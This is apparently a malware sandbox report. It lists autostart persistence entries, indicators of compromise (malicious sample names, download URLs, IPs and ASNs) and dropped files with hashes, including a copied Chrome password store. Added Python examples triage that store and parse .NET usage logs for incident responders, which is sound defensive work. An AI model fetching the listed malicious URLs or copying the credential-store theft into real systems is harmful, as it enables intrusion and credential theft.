00:57:42  Autostart        Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ss1rvshv2lo "C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe" 1 3.1613346908.6029b85c957f5
00:57:55  Autostart        Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce uebphkk2rfv "C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe" 1 3.1613346908.6029b85c957f5

                                                              Joe Sandbox View / Context

                                                              IPs

Match, associated sample name / URL, detection, context (the SHA 256 and Link columns are report links and are omitted here). 8.8.8.8 and 1.1.1.1 are public DNS resolvers, so other samples sharing them reflect a resolver choice rather than shared attacker infrastructure.

8.8.8.8
• BadStuff.js (malicious), context: 8.8.8.8/SlvMWdIEW62C9c
• BadStuff.js (malicious), context: 8.8.8.8/CTM5wttwLFcLdHfVk
• 33payment advice.exe (malicious), context: www.zulinfang.mobi/fu/?id=i07vHMa0svfKfxE6I3aRHA3lctcdYaT9x0iZT9MH0oRhMFPgh9mSEtNU17XFCBgMQA4XWErQDlzTwB-AplygzQ..
• 37documents.exe (malicious), context: www.tasteofunexpected.com/tf/?id=y6IrbpvfhkYfQXXyqC8dooAvfrv2e2apV7igF70LYGyF4OCvwj5JxRVBdRghvKGGuc_KsFbnbWPC0Def
• 63AWB 043255.exe (malicious), context: www.serikatsaudagarnusantara.com/ed/?id=kIz4OnF7tHMqdv1cSepeHoY02Vsws5yCI7zf8DN1pvMb9hdHFpZX44eSyhzXC7u5icfl1yYYsvfyl6we
• d62c.exe (malicious), context: www.epckednilm.info/fu/?id=i07vHMa0svfKfxE6I3aRHA3lctcdYaT9x0iZT9MH0oRhMFPgh9mSEtNU17XFCBgMQA4XWErQDlzTwB-AplygzQ..
• 27TTcopyMT107-36000_payment.exe (malicious), context: www.watchsummer.com/tr/?id=oqCXvgIUiCxPFtn1J0rb33q5mpSH48Vd1XRAfBxi4MgNDwsdTt0dcXb5dgzj2vPAuld1RDreAlRWWLP9Xot16w..&sql=1
• download_adobeflashplayer_install_9_.exe (malicious), context: wetr34.sitesled.com/wind.jpg
• INV-000524.vbs (malicious), context: naturofind.org/p66/JIKJHgft
• 177Purchase Order.exe (malicious), context: www.phutungototp.com/ho/?id=y3T6nEBciedL7htO4xn1ZYijVAw7sJXLjwubagvJUtMFVf7aOWPSa_Bl5i178f_EjROvybrSr7PC3267XbUsBg..
• 8Order Inquiry.exe (malicious), context: www.quyuar.com/dr/?id=gCqdDQsh4d7ynFKSj09V1Y12J91NTUfM9LddDKzxEGHO7R4ogEQ3AGAU2DRYiF_Nduo4Rd-EW24x-O38aOud_g..
• 27Tobye.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 11Marena.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 39Harriot.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 1Vida.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 43Colleen.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 67Roxanne.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 15Winnah.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 33Elfrida.js (malicious), context: my.internaldating.ru/js/boxun4.bin
• 25Cornelle.js (malicious), context: my.internaldating.ru/js/boxun4.bin

1.1.1.1
• QQ9.0.1.exe (malicious), context: url-quality-stat.xf.qq.com/Analyze/Data?v=1&&format=json&&qq=0&&cmd=21&&product=qqdownload

5.101.110.225
• http://keep3455.ams3.digitaloceanspaces.com (malicious), context: keep3455.ams3.digitaloceanspaces.com/

                                                              Domains

                                                              No context

                                                              ASN

Match (ASN), associated sample name / URL, detection, context (the SHA 256 and Link columns are report links and are omitted here).

ON-LINE-DATAServerlocation-NetherlandsDrontenNL
• #U10e1#U10d0#U10e4#U10e0#U10d0#U10dc#U10d2#U10d4#U10d7#U10d8.exe (malicious), context: 185.235.130.84
• IMG_222446.doc (malicious), context: 185.206.215.56
• IMG_804941.doc (malicious), context: 185.206.215.56
• tyxCV1ouryr7.exe (malicious), context: 185.241.54.156
• PO 9174-AR.doc (malicious), context: 185.206.215.56
• SecuriteInfo.com.Trojan.Packed2.42783.14273.exe (malicious), context: 185.206.215.56
• P.O 119735.doc__.rtf (malicious), context: 185.206.215.56
• SecuriteInfo.com.Trojan.Packed2.42783.32.exe (malicious), context: 185.206.215.56
• IMG_688031.doc (malicious), context: 185.206.215.56
• file.exe (malicious), context: 185.206.215.56
• file.exe (malicious), context: 185.206.215.56
• Shipping Document PL&BL Draft.exe (malicious), context: 92.119.115.38
• Cena upit AA008957 01-21-2021.doc (malicious), context: 80.89.229.149
• Cena upit BB008957 01-20-2021.doc (malicious), context: 80.89.229.149
• New Order Feb.,2021.doc (malicious), context: 185.244.219.92
• SKM20012021.doc (malicious), context: 185.244.219.92
• order 5121.doc (malicious), context: 80.89.229.149
• TC OVERHAULING W_ID8703007.doc (malicious), context: 80.89.229.149
• IMG_12283.exe (malicious), context: 185.206.215.56
• IMG_06176.pdf.exe (malicious), context: 185.206.215.56

ITLDC-NLUA
• carirstlite.exe (malicious), context: 217.12.209.200
• SecuriteInfo.com.BehavesLike.Win32.Generic.cm.exe (malicious), context: 5.34.180.229
• SEPMtwY6G2.exe (malicious), context: 185.174.175.22
• ieO61Pwnmq.exe (malicious), context: 185.14.29.115
• USD44,980.07 Payment advise REF.xlsx (malicious), context: 91.235.129.3
• SecuriteInfo.com.Trojan.DownloaderNET.117.13923.exe (malicious), context: 185.174.175.2
• NEW QUOTATION AGREEMENT.doc (malicious), context: 185.174.175.2
• PO_120610361.xlsx (malicious), context: 91.235.129.3
• random.dll (malicious), context: 5.34.180.180
• urROpgWmZP.exe (malicious), context: 5.34.180.19
• HjsYovaLmf.exe (malicious), context: 5.34.180.19
• yVn2ywuhEC.exe (malicious), context: 185.14.28.165
• bEuBS6SwMo.exe (malicious), context: 185.14.31.88
• PAYMENT.260121.xlsx (malicious), context: 91.235.129.146
• eEXZHxdxFE.exe (malicious), context: 185.14.31.88
• ltf94qhZ37.exe (malicious), context: 185.14.31.88
• .01.2021a.js (malicious), context: 185.14.31.88
• TT Payment Copy.xlsx (malicious), context: 91.235.129.146
• DiPa4roAqT.exe (malicious), context: 185.14.31.88
• dif019MoIw.exe (malicious), context: 185.14.31.88

CLOUDFLARENETUS
• BleachGap.exe (malicious), context: 162.159.135.232
• Attachment.exe (malicious), context: 162.159.129.233
• Uninstall.exe (malicious), context: 1.1.1.1
• SecuriteInfo.com.Trojan.Siggen11.11008.27532.exe (malicious), context: 104.23.98.190
• ProtectedAdviceSlip.xls (malicious), context: 104.22.0.232
• ERRoqGpsIS.dll (malicious), context: 104.21.45.75
• notice of arrival.xlsx (malicious), context: 172.67.8.238
• LSuDNrw50J.exe (malicious), context: 104.21.19.200
• 3aVBS43Xc2.exe (malicious), context: 172.67.193.215
• lumJSEHnFa.exe (malicious), context: 172.67.184.253
• A6Qom7We0l.exe (malicious), context: 104.21.59.243
• aUWqpYqmXT.exe (malicious), context: 104.21.61.164
• BHuuI8LETf.exe (malicious), context: 104.21.59.243
• m1hholPLan.exe (malicious), context: 104.21.59.243
• nyDyMJGKWD.exe (malicious), context: 104.21.59.243
• SX35.vbs (malicious), context: 104.21.234.56
• QQ56.vbs (malicious), context: 104.21.234.56
• UX74.vbs (malicious), context: 104.21.234.56
• EG45.vbs (malicious), context: 104.21.234.57
• MusicConverter.exe (malicious), context: 172.67.160.132

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

C:\Program Files\89C8W4UQTF\89C8W4UQT.exe
Process: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 276992
Entropy (8bit): 6.09207759062412
Encrypted: false
SSDEEP: 6144:FVmHR3X1KmBEqV5XzDSBO9qfYtYwF6Px7bO0/LUOASZ:jmXKCvVhyOIf3kGhr
MD5: 6195B97E8DCE6CE5E279A68E7BA4BE3F
SHA1: F33CCE9F1629BDCF7E601E680F90455001A6B265
SHA-256: 1A0DCFD8BE58C299BD4A6872B5F05F55A9CDC834C8BCF0984489389A282DAD33
SHA-512: C51B9DCA5F55B478B1F632BDE08DB9177EBA3AC4B4F8B86CD2C9919EB0DD9D3A642D0E1456F1BEE7AB4BF867805179F91BD8AA3B0A739BC10BD558C0CFF37F2C
Malicious: true
Antivirus:
• Avira, detection: 100%
• Joe Sandbox ML, detection: 100%
Reputation: low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..&...........E... ...`....@.. ....................................@.................................;E..O....`..8............................D..8............................................ ............... ..H............text....%... ...&.................. ..`.rsrc...8....`.......(..............@..@.reloc...............8..............@..B................oE......H........"..`............2...............................................0..............!.....(.....(.......(....~....o....o.......o.......o.....o....o......s...........s.........s.........o ......2..,...o!.......,...o!.......,...o!......,..o!.......*..4....f..r........\.#.........P.<...................".("....*.r...p.....r#..p.....r5..p.....rG..p.....*..0..q...........!....(#...r...po$...s....o ...(....(......(%...o&...r...po'....(%....o(...t.............%.....o)...&........
C:\Program Files\89C8W4UQTF\89C8W4UQT.exe.config
Process: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1810
Entropy (8bit): 5.029991107025393
Encrypted: false
SSDEEP: 24:2dZmhW3aXfygeOygjOgC5XgtXdXkBHnUdQzFDWby2GpyI:cccAfyge7gjOgCNgBRkBHUdQzqQ
MD5: A2EBF843442988EE2D667E9C7FC28CE1
SHA1: 7F24C475BB217C448090DCE593ABEE8957B7B1D4
SHA-256: 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
SHA-512: 1B56DB588131023F427E0476582E3381A818D9659C75B34D094630909482D1A540480F95CF663C1700B2D54431C5539D969EBD332A3F017BE29A8212872D2B84
Malicious: true
Reputation: low
                                                              Preview: <?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v2.0.50727"/>.. .. <supportedRuntime version="v3.5"/> "The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.".. -->.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3" />.. <supportedRuntime version="v4
C:\Program Files\89C8W4UQTF\uninstaller.exe
Process: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 310784
Entropy (8bit): 6.085741699285741
Encrypted: false
SSDEEP: 6144:5BqK7a8lON/DMHSs8feVtDdqMmE36eUJTAUHEGzQJ5QpEbBm/CpfHr:5BqKOobyGpHejJT3Fzq5gO5pfL
MD5: 12B3B48933978FEBB658A785ACFB13CF
SHA1: 54C62741F2270BE1731E5DD1998F4334D474A540
SHA-256: 13131DB30904FC8CA3B1AEF681CD44FB8018ECD9075411CCCA12EDEB611615D7
SHA-512: 2628FCAB2647E90BB94D26C8845B808971A3BC55C2A827600C3A837350B96AA2A6749852CD456E08BBE271377E1F83941F226B258574B6CEC51CE3ECBAA40020
Malicious: true
Antivirus:
• Avira, detection: 100%
• Joe Sandbox ML, detection: 100%
Reputation: low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?:..........."...0.................. ........@.. ....................... ............@.....................................O.......@...........................0...8............................................ ............... ..H............text...$.... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........"..`............2..(............................................0..............!.....(.....(.......(....~....o....o.......o.......o.....o....o......s...........s.........s.........o ......2..,...o!.......,...o!.......,...o!......,..o!.......*..4....f..r........\.#.........P.<...................".("....*.r...p.....r#..p.....r5..p.....rG..p.....*..0..q...........!....(#...r...po$...s....o ...(....(......(%...o&...r...po'....(%....o(...t.............%.....o)...&........
C:\Program Files\89C8W4UQTF\uninstaller.exe.config
Process: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1810
Entropy (8bit): 5.029991107025393
Encrypted: false
SSDEEP: 24:2dZmhW3aXfygeOygjOgC5XgtXdXkBHnUdQzFDWby2GpyI:cccAfyge7gjOgCNgBRkBHUdQzqQ
MD5: A2EBF843442988EE2D667E9C7FC28CE1
SHA1: 7F24C475BB217C448090DCE593ABEE8957B7B1D4
SHA-256: 8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
SHA-512: 1B56DB588131023F427E0476582E3381A818D9659C75B34D094630909482D1A540480F95CF663C1700B2D54431C5539D969EBD332A3F017BE29A8212872D2B84
Malicious: true
Reputation: low
                                                              Preview: <?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v2.0.50727"/>.. .. <supportedRuntime version="v3.5"/> "The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.".. -->.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3" />.. <supportedRuntime version="v4
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data1
Process: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: true
Reputation: high, very likely benign file
Note: this is a copy of Chrome's Login Data credential store written next to the original by vkfgkd5pxm1.exe, the browser-stealing step of the chain. The "high" reputation describes the SQLite content (an almost empty database, which is why the entropy is so low), not the act of copying it.
                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
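`Login Data1` above is a copy of Chrome's password store written by vkfgkd5pxm1.exe: Chrome keeps the live database open, so stealers copy it and read the copy. The triage routine below is an added example, not code from the sandbox report or from the malware. It checks the SQLite magic, confirms the `logins` table is present, and labels each stored secret by its blob prefix without decrypting anything. The database it inspects is constructed inside the block; the column subset and the blob headers are assumptions drawn from Chrome's known schema and the DPAPI blob format, not from the sandbox's file.

```python
"""Triage a copied Chrome 'Login Data' SQLite file without decrypting it.

Added example, not part of the sandbox report.  A responder who finds such a
copy wants to know whether it really is the password store and what kind of
secrets it holds.  The sample database below is constructed.
"""
import os
import sqlite3
import tempfile
from pathlib import Path
from typing import Dict

SQLITE_MAGIC = b"SQLite format 3\x00"           # first 16 bytes of every SQLite 3 file
# CryptProtectData blob header: version 1 + provider GUID (assumption taken from
# the documented DPAPI on-disk format; used here only to label legacy entries).
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def make_sample_login_data(path: str) -> None:
    """Constructed look-alike: Chrome's real 'logins' table has more columns;
    these are the ones a credential stealer reads."""
    con = sqlite3.connect(path)
    con.execute(
        "CREATE TABLE logins (origin_url TEXT, action_url TEXT, "
        "username_value TEXT, password_value BLOB, date_created INTEGER)"
    )
    con.executemany("INSERT INTO logins VALUES (?, ?, ?, ?, ?)", [
        # Chrome 80+ entry: 'v10' + 12-byte nonce + AES-GCM ciphertext + 16-byte tag
        ("https://example.com/login", "https://example.com/login", "alice",
         b"v10" + bytes(12) + b"\x00" * 8 + bytes(16), 13250000000000000),
        # pre-Chrome-80 entry: raw DPAPI blob
        ("https://mail.example.org/", "https://mail.example.org/", "bob",
         DPAPI_MAGIC + bytes(32), 13250000000000000),
    ])
    con.commit()
    con.close()


def classify_secret(blob: bytes) -> str:
    """Label the protection scheme from the blob prefix; no decryption."""
    if blob[:3] in (b"v10", b"v11"):
        return "aes-gcm (key is DPAPI-wrapped in Local State)"
    if blob.startswith(DPAPI_MAGIC):
        return "dpapi (decryptable only as the victim user)"
    return "unknown"


def triage_login_data(path: str) -> Dict:
    with open(path, "rb") as f:
        if f.read(16) != SQLITE_MAGIC:
            return {"is_sqlite": False}
    # read-only URI so triage never modifies the evidence file
    con = sqlite3.connect(Path(path).resolve().as_uri() + "?mode=ro", uri=True)
    tables = {r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")}
    result = {"is_sqlite": True, "size": os.path.getsize(path),
              "has_logins": "logins" in tables, "entries": []}
    if result["has_logins"]:
        rows = con.execute(
            "SELECT origin_url, username_value, password_value FROM logins")
        for url, user, blob in rows:
            result["entries"].append(
                {"origin": url, "user": user, "secret": classify_secret(bytes(blob))})
    con.close()
    return result


def demo() -> Dict:
    """Build the constructed sample under the name the dropper used and triage it."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "Login Data1")
        make_sample_login_data(p)
        return triage_login_data(p)


if __name__ == "__main__":
    r = demo()
    print(f"sqlite={r['is_sqlite']} logins_table={r['has_logins']} entries={len(r['entries'])}")
    for e in r["entries"]:
        print(f"  {e['origin']:<28} {e['user']:<8} {e['secret']}")
```

Run against the real dropped copy, a result with `has_logins` true and an empty `entries` list is what the sandbox's 40960-byte, 0.79-entropy file would most likely produce: a freshly created profile database is mostly zero-filled pages, which is consistent with the low entropy reported above.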
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\multitimer.exe.log
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):758
                                                              Entropy (8bit):5.223424380940924
                                                              Encrypted:false
                                                              SSDEEP:12:Q3LaJcP0kaHYGLi1B01kKVdisk70hK9C4XXhK9yi0z6+xai0ELv:MLfaYgioQ6K/XhKoRt
                                                              MD5:62B0EEFF6FD512178D0FED52F80EB053
                                                              SHA1:13162759E7F5055A23D9A80BCBE40F2029733B3B
                                                              SHA-256:9F4778089C9C3DA87BFD0BD1809FAC2CDF2860B71CFAF9D78B89875F66B40C0C
                                                              SHA-512:649BA3D6997BD60FFF226D9F4905012C1162C09DEABE060B2E66216BE91D1EE2D826A1B58397A151292A6DDCFCD2B651BD63F9518CD38828915C3245E8C376C5
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\e1a7c69e45e7d55c1e531bb6e9526824\System.Data.ni.dll",0..
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\tpwlxkeo40z.exe.log
                                                              Process:C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):380
                                                              Entropy (8bit):5.226600785864345
                                                              Encrypted:false
                                                              SSDEEP:6:Q3LadLCDDXTg+Q+OLCYK9C4dV2YlzK9yiOLCs6+uAbOiv:Q3LaJcP0hK9C4XXhK9yi0z6+xaiv
                                                              MD5:D6988CDBCD92594C5A8F23D7A2567BFB
                                                              SHA1:E04D1384C77906897C6D1F5B96324C8579E95FF3
                                                              SHA-256:8CBDD6F8BAFB8A402AD10D5B069CBFAD0E2E034E6BCB5F8C6D56842A08C1DB9A
                                                              SHA-512:08FEAB8AFDC359A7458B3A4EE0114CBECBC6BC21FC4F6D5E0095E526565062152B9AB32005F39914A0228B296E7800FC6FF8C697F3195CF7380BE5F2917F83F2
                                                              Malicious:false
                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\2mqvpn30gyk.exe.log
                                                              Process:C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1281
                                                              Entropy (8bit):5.367899416177239
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KrgKDE4KGKN08AKha1qE4GiD0E4KeGiKIE4TKD1KoZAE4KKPz:MxHKEYHKGD8Aoa1qHGiD0HKeGitHTG1Q
                                                              MD5:0FEC086554DBF3C4E7205D7913CCDA18
                                                              SHA1:C2FF919D834B2175BBF8308132F1FF8C69726770
                                                              SHA-256:F22CFD1C1A200B4FC7F71BCCDA4275069361241790A91BE65E1CD8935EDFDB47
                                                              SHA-512:3DEB6AFE2F99E4F13B9DD295710E9F15E16ECD506431234175F505072DBA6B025014A0C66AB321F5D2FA1C70DB8C9381544D4904FFB217D1C2CBF1A0E77359A4
                                                              Malicious:false
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.log
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):847
                                                              Entropy (8bit):5.350326386662965
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKEYHKGD8AoPtHTG1hAHKKPz
                                                              MD5:8695FFB03DE68402BA23CADD1D71EF14
                                                              SHA1:67BBF40D11F0B1841FEE4F622E07855787065E0B
                                                              SHA-256:1F0942A2EECF4990E027C7D609E319ADCF4563F984DD0D8EF2B370A1817F3C1C
                                                              SHA-512:6EDEEAB5EF14473DF54251D69A3E2B7AC29778AEF929F8EC05F03008BF9AD629FE315115B22EDC09E92E1D7F2869CF9D4DDC6DB92C4158E92F80DEDA5A365098
                                                              Malicious:true
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..
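The `*.exe.log` files under `CLR_v2.0\UsageLogs` and `CLR_v4.0\UsageLogs` above are written by the .NET runtime when an assembly executes; the file name is the process image name and the type-3 records list the native images it bound to, which makes them evidence that a given dropped executable actually ran and under which CLR. The parser below is an added example, not part of the sandbox report: it reads the record layout exactly as the previews show it (`..` in a preview stands for a CRLF), distinguishing the CLR v2 form, which carries only a path, from the CLR v4 form, which carries the assembly display name before the path. The two sample logs are constructed from the previews above.

```python
"""Parse .NET CLR UsageLogs (<image>.exe.log) as seen in the dropped-file list.

Added example, not part of the sandbox report.  Record layout is taken from the
previews on this page: type 1 lines are binder settings, type 3 lines are the
native images the process bound to.  CLR v2 logs carry just the image path;
CLR v4 logs also carry the assembly display name before the path.
"""
import csv
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed samples modelled on the previews above ("..": CRLF).
SAMPLE_V2 = (
    '1,"fusion","GAC",0\r\n'
    '3,"C:\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\'
    '1201f26cb986c93f55044bb4fa22b294\\System.ni.dll",0\r\n'
    '3,"C:\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\'
    'e1a7c69e45e7d55c1e531bb6e9526824\\System.Data.ni.dll",0\r\n'
)
SAMPLE_V4 = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\'
    '10a17139182a9efd561f01fada9688a5\\System.ni.dll",0\r\n'
    '3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\'
    'f2e3165e3c718b7ac302fea40614c984\\System.Xml.ni.dll",0\r\n'
)

# NativeImages_<clr version>_<bitness> directory component of every image path
NATIVE_IMAGE_DIR = re.compile(r"NativeImages_v([\d.]+)_(\d+)")


@dataclass
class LoadedAssembly:
    name: str                    # e.g. "System.Data" (from System.Data.ni.dll)
    path: str                    # native image path as written in the log
    clr_version: str             # e.g. "2.0.50727" or "4.0.30319"
    bitness: int                 # 32 or 64, from the NativeImages directory name
    display_name: Optional[str]  # CLR v4 only: "System, Version=4.0.0.0, ..."


def parse_usage_log(text: str) -> List[LoadedAssembly]:
    """Return the native images a type-3 record says the process bound to."""
    out: List[LoadedAssembly] = []
    # csv handles the quoted display name, whose own commas would otherwise split
    for fields in csv.reader(text.splitlines()):
        if not fields or fields[0] != "3":
            continue             # type 1 = binder settings, nothing was loaded
        path = fields[-2]        # last field is a flag; the path precedes it
        display = fields[1] if len(fields) == 4 else None
        m = NATIVE_IMAGE_DIR.search(path)
        ver, bits = (m.group(1), int(m.group(2))) if m else ("?", 0)
        base = ntpath.basename(path)      # Windows separators on any host
        name = base[:-len(".ni.dll")] if base.lower().endswith(".ni.dll") else base
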